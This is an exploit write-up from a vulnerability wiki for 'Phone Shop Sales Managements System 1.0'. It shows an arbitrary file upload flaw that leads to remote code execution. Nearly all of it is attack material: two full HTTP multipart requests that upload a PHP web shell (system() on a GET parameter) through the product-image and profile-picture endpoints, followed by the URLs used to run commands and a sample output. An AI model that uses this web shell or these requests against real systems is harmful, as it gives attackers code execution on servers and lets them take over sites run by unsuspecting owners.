pwnwiki.com
,
# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution # Date: 2021-07-06 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html # Version: 1.0 # Tested on: Windows 10, XAMPP ########### # PoC 1: # ########### Request: ======== POST /osms/Execute/ExAddProduct.php HTTP/1.1 Host: localhost Content-Length: 2160 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/AddNewProduct.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0 Connection: close ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductName" camera ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="BrandName" soskod ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductPrice" 12 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Quantity" 1 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="TotalPrice" 12 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="DisplaySize" 15 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="OperatingSystem" windows ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Processor" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="InternalMemory" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="RAM" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="CameraDescription" lens ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="BatteryLife" 3300 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Weight" 500 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Model" AIG34 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Dimension" 5 inch ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ASIN" 9867638 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductImage"; filename="rev.php" Content-Type: application/octet-stream <?php echo "result: ";system($_GET'rev'); ?> ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="date2" 2020-06-03 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Description" accept ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="_wysihtml5_mode" 1 ------WebKitFormBoundaryIBZWMUliFtu0otJ0-- ########### # PoC 2: # ########### Request: ======== POST /osms/Execute/ExChangePicture.php HTTP/1.1 Host: localhost Content-Length: 463 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/UserProfile.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594 Connection: close ------WebKitFormBoundary4Dm8cGBqGNansHqI Content-Disposition: form-data; name="IDUser" 6 ------WebKitFormBoundary4Dm8cGBqGNansHqI Content-Disposition: form-data; name="Image"; filename="rev.php" Content-Type: application/octet-stream <?php echo "output: ";system($_GET'rev'); ?> ------WebKitFormBoundary4Dm8cGBqGNansHqI-- ########### # Access: # ########### # Webshell access via: PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami # Output: result: windows10\user
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库